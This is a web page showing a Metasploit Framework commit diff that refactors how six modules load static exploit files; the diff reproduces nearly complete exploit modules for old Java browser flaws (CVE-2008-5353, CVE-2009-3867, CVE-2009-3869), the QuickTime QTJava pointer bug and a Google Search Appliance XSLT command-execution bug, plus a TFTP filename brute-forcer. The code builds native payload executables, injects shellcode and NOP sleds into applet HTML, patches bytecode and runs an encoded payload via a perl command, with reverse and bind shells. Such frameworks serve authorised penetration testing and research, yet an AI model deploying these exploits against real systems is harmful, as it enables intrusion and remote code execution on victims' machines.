infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

try not to repeatedly load static files - see #694 

git-svn-id: file:///home/svn/framework3/trunk@8166 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-01-19 19:12:42 +00:00
parent a60733c5dd
commit 310be42bfa
6 changed files with 232 additions and 192 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/auxiliary/scanner/tftp/tftpbrute.rb
View File

@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(69),
OptPath.new('DICTIONARY', [ true, 'The list of filenames', File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ])
OptPath.new('DICTIONARY', [ true, 'The list of filenames',
File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ])
], self.class)
end
@ -41,9 +42,9 @@ class Metasploit3 < Msf::Auxiliary
{
'Msf' => framework,
'MsfExploit' => self,
}
}
)
fd = File.open(datastore['DICTIONARY'], 'r')
fd.read(fd.stat.size).split("\n").each do |filename|
filename.strip!

95
modules/exploits/multi/browser/java_calendar_deserialize.rb
View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,37 +16,37 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize( info = {} )
super( update_info( info,
'Name' => 'Sun Java Calendar Deserialization Exploit',
'Description' => %q{
'Name' => 'Sun Java Calendar Deserialization Exploit',
'Description' => %q{
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.
The payload can be either a native payload which is generated as an executable and
The payload can be either a native payload which is generated as an executable and
dropped/executed on the target or a shell from within the Java applet in the target browser.
The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16
and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
},
'License' => MSF_LICENSE,
'Author' => [ 'sf', 'hdm' ],
'Version' => '1',
'References' =>
'License' => MSF_LICENSE,
'Author' => [ 'sf', 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-5353' ],
[ 'OSVDB', '50500'],
[ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
],
'Platform' => [ 'win', 'osx', 'linux', 'solaris' ],
'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
'Platform' => [ 'win', 'osx', 'linux', 'solaris' ],
'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
[ 'Generic (Java Payload)',
{
# This is a bad hack to force only the generic/shell_bind_tcp and generic/shell_reverse_tcp payloads
'Platform' => ['win'],
@ -50,36 +54,47 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD,
}
],
[ 'Windows x86 (Native Payload)',
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X PPC (Native Payload)',
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Mac OS X x86 (Native Payload)',
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0
'DefaultTarget' => 0
))
end
def exploit
# load the static jar file
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" )
fd = File.open( path, "rb" )
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri( cli, request )
data = nil
host = nil
@ -90,15 +105,15 @@ class Metasploit3 < Msf::Exploit::Remote
send_redirect( cli, get_resource() + '/', '')
return
end
print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )
payload = regenerate_payload( cli )
if not payload
print_status( "Failed to generate the payload." )
return
end
if target.name == 'Generic (Java Payload)'
if datastore['LHOST']
host = datastore['LHOST']
@ -110,15 +125,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." )
end
else
if target['Arch'] == ARCH_X86
data = Msf::Util::EXE.to_win32pe( framework, payload.encoded ) if target['Platform'] == 'win'
data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux'
elsif target['Arch'] == ARCH_PPC
data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
end
if data
print_status( "Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
@ -126,19 +141,19 @@ class Metasploit3 < Msf::Exploit::Remote
print_status( "Failed to generate the executable." )
return
end
end
send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
return
end
print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )
print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )
send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
handler( cli )
end
def generate_html( data, host, port )
html = "<html><head><title>Loading, Please Wait...</title></head>"
html += "<body><center><p>Loading, Please Wait...</p></center>"
@ -149,13 +164,9 @@ class Metasploit3 < Msf::Exploit::Remote
html += "</applet></body></html>"
return html
end
def generate_jar()
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" )
fd = File.open( path, "rb" )
data = fd.read(fd.stat.size)
fd.close
return data
return @jar_data
end
end

86
modules/exploits/multi/browser/java_getsoundbank_bof.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GreatRanking
#
# This module acts as an HTTP server
@ -26,25 +26,25 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the getSoundbank function in the Sun JVM.
The payload is serialized and passed to the applet via PARAM tags. It must be
a native payload.
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
earlier, and SDK and JRE 1.3.1_26 and earlier.
NOTE: Although all of the above versions are reportedly vulnerable, only
1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
},
'License' => MSF_LICENSE,
'Author' =>
'Author' =>
[
'kf', # Original PoC/exploit
'jduck' # metasploit version
],
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'CVE', '2009-3867' ],
[ 'OSVDB', '59711' ],
@ -70,19 +70,19 @@ No automatic targetting for now ...
}
],
=end
[ 'J2SE 1.6_16 on Windows x86',
[ 'J2SE 1.6_16 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'J2SE 1.6_16 on Mac OS X PPC',
[ 'J2SE 1.6_16 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'J2SE 1.6_16 on Mac OS X x86',
[ 'J2SE 1.6_16 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
@ -93,23 +93,34 @@ No automatic targetting for now ...
'DisclosureDate' => 'Nov 04 2009'
))
end
def exploit
# load the static jar
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
fd = File.open(path, "rb")
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
@ -118,27 +129,27 @@ No automatic targetting for now ...
end
end
# Clean the cache
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.jar$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
print_status("Sending redirect so path ends with / ...")
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(payload.encoded),
@ -148,10 +159,10 @@ No automatic targetting for now ...
})
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req),
send_response(cli, generate_applet(cli, req),
{
'Content-Type' => 'application/octet-stream',
'Pragma' => 'no-cache'
@ -169,14 +180,18 @@ No automatic targetting for now ...
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3867.jar'>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
|
# ugh.. pain
# finalize the html
jar_name = rand_text_alphanumeric(32)
html.gsub!(/JARNAME/, jar_name)
# add payload
debug_payload = false
pload = ""
pload << "\xcc" if debug_payload
@ -188,11 +203,12 @@ No automatic targetting for now ...
print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
end
html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
# add nops
nops = "\x90\x90\x90\x90"
html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
return html
end
@ -201,7 +217,7 @@ No automatic targetting for now ...
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
@ -211,13 +227,7 @@ No automatic targetting for now ...
this_target = target
end
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
fd = File.open(path, "rb")
data = fd.read(fd.stat.size)
fd.close
return data
end
return @jar_data
end
end

83
modules/exploits/multi/browser/java_setdifficm_bof.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GreatRanking
#
# This module acts as an HTTP server
@ -26,24 +26,24 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the setDiffICM function in the Sun JVM.
The payload is serialized and passed to the applet via PARAM tags. It must be
a native payload.
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
earlier, and SDK and JRE 1.3.1_26 and earlier.
NOTE: Although all of the above versions are reportedly vulnerable, only
1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
},
'License' => MSF_LICENSE,
'Author' =>
'Author' =>
[
'jduck'
],
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'CVE', '2009-3869' ],
[ 'OSVDB', '59710' ],
@ -70,19 +70,19 @@ No automatic targetting for now ...
}
],
=end
[ 'J2SE 1.6_16 on Windows x86',
[ 'J2SE 1.6_16 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'J2SE 1.6_16 on Mac OS X PPC',
[ 'J2SE 1.6_16 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'J2SE 1.6_16 on Mac OS X x86',
[ 'J2SE 1.6_16 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
@ -93,23 +93,23 @@ No automatic targetting for now ...
'DisclosureDate' => 'Nov 04 2009'
))
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
@ -118,27 +118,27 @@ No automatic targetting for now ...
end
end
# Clean the cache
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.jar$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
print_status("Sending redirect so path ends with / ...")
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(payload.encoded),
@ -148,10 +148,10 @@ No automatic targetting for now ...
})
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req),
send_response(cli, generate_applet(cli, req),
{
'Content-Type' => 'application/octet-stream',
'Pragma' => 'no-cache'
@ -169,14 +169,18 @@ No automatic targetting for now ...
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3869.jar'>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
|
# ugh.. pain
# finalize html
jar_name = rand_text_alphanumeric(32)+".jar"
html.gsub!(/JARNAME/, jar_name)
# put payload into html
debug_payload = false
pload = ""
pload << "\xcc" if debug_payload
@ -188,20 +192,31 @@ No automatic targetting for now ...
print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
end
html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
# put nops into html
nops = "\x90\x90\x90\x90"
html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
return html
end
def exploit
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")
fd = File.open(path, "rb")
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
@ -211,13 +226,7 @@ No automatic targetting for now ...
this_target = target
end
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")
fd = File.open(path, "rb")
data = fd.read(fd.stat.size)
fd.close
return data
end
return @jar_data
end
end

93
modules/exploits/multi/browser/qtjava_pointer.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -26,18 +26,18 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access',
'Description' => %q{
This module exploits an arbitrary memory access vulnerability in the
Quicktime for Java API provided with Quicktime 7.
Quicktime for Java API provided with Quicktime 7.
},
'License' => MSF_LICENSE,
'Author' =>
'Author' =>
[
'hdm', # Original exploit for Mac OS X PPC / Win32
'kf', # Added support for Mac OS X X86
'ddz' # Discovered bug, provided tips
],
'Version' => '$Revision$',
'References' =>
'References' =>
[
['CVE', '2007-2175'],
['OSVDB', '34178'],
@ -54,100 +54,112 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Problem with generic payloads + regenerate_payload still :(
#
# [ 'Quicktime 7 Automatic',
# [ 'Quicktime 7 Automatic',
# {
# 'Platform' => ['win', 'osx'],
# 'Arch' => [ARCH_X86, ARCH_PPC]
# }
# ],
[ 'Quicktime 7 on Windows x86',
[ 'Quicktime 7 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Quicktime 7 on Mac OS X PPC',
[ 'Quicktime 7 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Quicktime 7 on Mac OS X x86',
[ 'Quicktime 7 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
],
],
# 'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 23 2007'
))
end
def exploit
# load the class data
path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class")
fd = File.open(path, "rb")
@class_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
end
end
# Clean the cache
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.class$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })
send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' })
# Handle the payload
handler(cli)
end
def generate_html()
return "<html><head></head><body><applet width='1' height='1' code='QTJavaExploit.class'></applet></body></html>"
end
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
@ -157,15 +169,12 @@ class Metasploit3 < Msf::Exploit::Remote
this_target = target
end
path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class")
# make a copy..
data = @class_data.dup
fd = File.open(path, "rb")
data = fd.read(fd.stat.size)
fd.close
# 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86
idx_targ = data.index("\x03\x10\xcc\x54")
# 1024 bytes for shellcode
idx_code = data.index("\x03\x10\xf0\x54")
@ -175,34 +184,34 @@ class Metasploit3 < Msf::Exploit::Remote
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x01")
end
# Handle Mac OS X x86 / Windows x86
if (this_target.arch.include?(ARCH_X86))
if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows))
tp = regenerate_payload(cli, 'win', ARCH_X86, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x03")
end
if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX))
tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target)
data = patch_bytecode(idx_code, data, tp.encoded)
data = patch_bytecode(idx_targ, data, "\x02")
end
end
data = patch_bytecode(idx_targ, data, "\x02")
end
end
return data
end
end
def patch_bytecode(off, data, buff)
cnt = 0
off -= 1
while (cnt < buff.length)
cnt += 1
cnt += 1
while (! (data[off-1] == 0x10 && data[off+1] == 0x54))
off+=1
off += 1
end
data[off]=buff[cnt-1]
off += 1
@ -211,5 +220,5 @@ class Metasploit3 < Msf::Exploit::Remote
return data
end
end

60
modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Description' => %q{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
must be able to connect back to your machine for this exploit to work.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet netcat-e',
}
},
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
@ -58,24 +58,18 @@ class Metasploit3 < Msf::Exploit::Remote
# Handle incoming requests from the appliance
def on_request_uri(cli, request)
print_status("Handling new incoming HTTP request...")
path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
fd = File.open(path, "r")
data = fd.read(fd.stat.size)
fd.close
exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
data.gsub!(/:x:MSF:x:/, exec_str)
data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
send_response(cli, data)
end
def check
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
'vars_get' =>
{
'client' => rand_text_alpha(rand(15)+1),
'site' => rand_text_alpha(rand(15)+1),
@ -84,48 +78,54 @@ class Metasploit3 < Msf::Exploit::Remote
'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
}
}, 10)
if (res and res.body =~ /cannot be resolved to an ip address/)
print_status("This system appears to be vulnerable")
return Exploit::CheckCode::Vulnerable
end
if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
print_status("This system appears to be patched")
end
print_status("This system is not exploitable")
return Exploit::CheckCode::Safe
end
def exploit
# load the xml data
path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml")
fd = File.open(path, "r")
@xml_data = fd.read(fd.stat.size)
fd.close
print_status("Obtaining the appliance site and client IDs...")
# Send a HTTP/1.0 request to learn the site configuration
res = send_request_raw({
'uri' => '/',
'version' => '1.0'
}, 10)
if !(res and res['location'] and res['location'] =~ /site=/)
print_status("Could not read the location header: #{res.code} #{res.message}")
return
end
m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
if !(m and m[1] and m[2])
print_status("Invalid location header: #{res['location']}")
return
return
end
print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
start_service
print_status("Requesting a search using our custom XSLT...")
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
'vars_get' =>
{
'client' => m[2],
'site' => m[1],
@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
'proxyreload' => '1'
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print_status("Waiting on the payload to execute...")
@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote
else
print_status("No response from the server")
end
print_status("Shutting down the web service...")
stop_service
end
end